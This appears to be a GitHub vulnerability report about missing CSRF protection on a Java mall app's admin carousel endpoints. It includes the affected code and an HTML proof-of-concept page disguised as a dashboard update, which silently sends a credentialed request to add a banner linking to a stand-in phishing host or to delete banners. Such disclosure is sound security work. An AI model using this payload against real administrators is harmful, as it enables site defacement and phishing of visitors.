
CSRF Vulnerability in Admin Carousel Management #115

@flashzyc

Description


CSRF Vulnerability in Admin Carousel Management

Summary

The admin carousel (banner) management endpoints under /admin/** are protected only by the login interceptor (session cookie) and perform no CSRF token check. An attacker who gets a logged-in administrator to open a crafted page can therefore add, modify, or delete carousel images on the mall homepage, displaying malicious content or phishing links to every site visitor.

Vulnerability Details

Configuration-Level Issue

File: src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java

import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Configuration;
import org.springframework.web.servlet.config.annotation.InterceptorRegistry;
import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;
import ltd.newbee.mall.interceptor.AdminLoginInterceptor;

@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {

    @Autowired
    private AdminLoginInterceptor adminLoginInterceptor;

    @Override
    public void addInterceptors(InterceptorRegistry registry) {
        // Only an authentication (login) check is applied to /admin/**:
        // any request carrying a valid admin session cookie is let through.
        registry.addInterceptor(adminLoginInterceptor)
                .addPathPatterns("/admin/**");
        // ❌ No CSRF protection for admin operations
    }
}

Endpoint-Level Code Analysis

File: src/main/java/ltd/newbee/mall/controller/admin/NewBeeMallCarouselController.java

The controller is mapped under /admin, so the routes below are reachable as /admin/carousels/save, /admin/carousels/update and /admin/carousels/delete. All three change state and rely solely on the session cookie:

import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.*;

@Controller
@RequestMapping("/admin")
public class NewBeeMallCarouselController {

    // Add carousel (POST /admin/carousels/save)
    @PostMapping("/carousels/save")
    @ResponseBody
    public Result save(@RequestBody Carousel carousel) {
        // ❌ No CSRF token validation: the session cookie alone authorises the write
        // ⚠️ Can add malicious banners with phishing links
        // ... persists the carousel via the service layer (omitted)
    }

    // Update carousel (PUT /admin/carousels/update)
    @PutMapping("/carousels/update")
    @ResponseBody
    public Result update(@RequestBody Carousel carousel) {
        // ❌ No CSRF token validation
        // ⚠️ Can modify existing banners
        // ... updates the carousel via the service layer (omitted)
    }

    // Delete carousel (DELETE /admin/carousels/delete)
    @DeleteMapping("/carousels/delete")
    @ResponseBody
    public Result delete(@RequestBody Integer[] ids) {
        // ❌ No CSRF token validation
        // ⚠️ Can remove all homepage banners
        // ... soft-deletes the given carousel IDs via the service layer (omitted)
    }
}

Security Issues:

  1. ❌ No CSRF token validation on any carousel operation (save, update, delete)
  2. ⚠️ Can inject an attacker-controlled image URL via carouselUrl
  3. ⚠️ Can point the banner's redirectUrl at a phishing page
  4. ⚠️ Affects all site visitors, since the carousel is rendered on the public homepage

Proof of Concept (PoC)

<!DOCTYPE html>
<html>
<head>
    <title>Admin Dashboard Update</title>
</head>
<body>
    <h2>📊 Updating dashboard metrics...</h2>
    <p>Please wait...</p>
    
    <script>
        // Add malicious carousel with phishing link
        fetch('http://localhost:28089/admin/carousels/save', {
            method: 'POST',
            credentials: 'include',
            headers: {
                'Content-Type': 'application/json'
            },
            body: JSON.stringify({
                carouselUrl: 'https://evil-phishing-site.com/fake-login',
                redirectUrl: 'https://evil-phishing-site.com/steal-credentials',
                carouselRank: 1,  // Display first
                isDeleted: 0
            })
        })
        .then(response => response.json())
        .then(data => {
            document.body.innerHTML = '<h3>✅ Dashboard updated!</h3>';
        });
        
        // Alternative: Delete all existing carousels
        /*
        fetch('http://localhost:28089/admin/carousels/delete', {
            method: 'DELETE',
            credentials: 'include',
            headers: {
                'Content-Type': 'application/json'
            },
            body: JSON.stringify([1, 2, 3, 4, 5])  // Delete IDs 1-5
        });
        */
    </script>
</body>
</html>

Impact

Homepage defacement and mass phishing: an attacker can display malicious banners to all site visitors, leading to widespread phishing and brand reputation damage.

Exploitability note: because the endpoints bind @RequestBody JSON, the cross-origin fetch in the PoC sends Content-Type: application/json, which is not a CORS "simple request". The browser issues an OPTIONS preflight first and only sends the POST if the server's CORS response allows the attacker's origin; the request also only carries the admin session cookie if that cookie is not restricted by SameSite (current Chromium treats a cookie without the attribute as Lax, which withholds it on cross-site POST). Confirm both conditions in the target deployment before treating the PoC as a working exploit; the missing token check is the root cause either way, and a form-encoded variant or a permissive CORS configuration would remove the preflight obstacle.

CVSS Score: 7.8 (High)
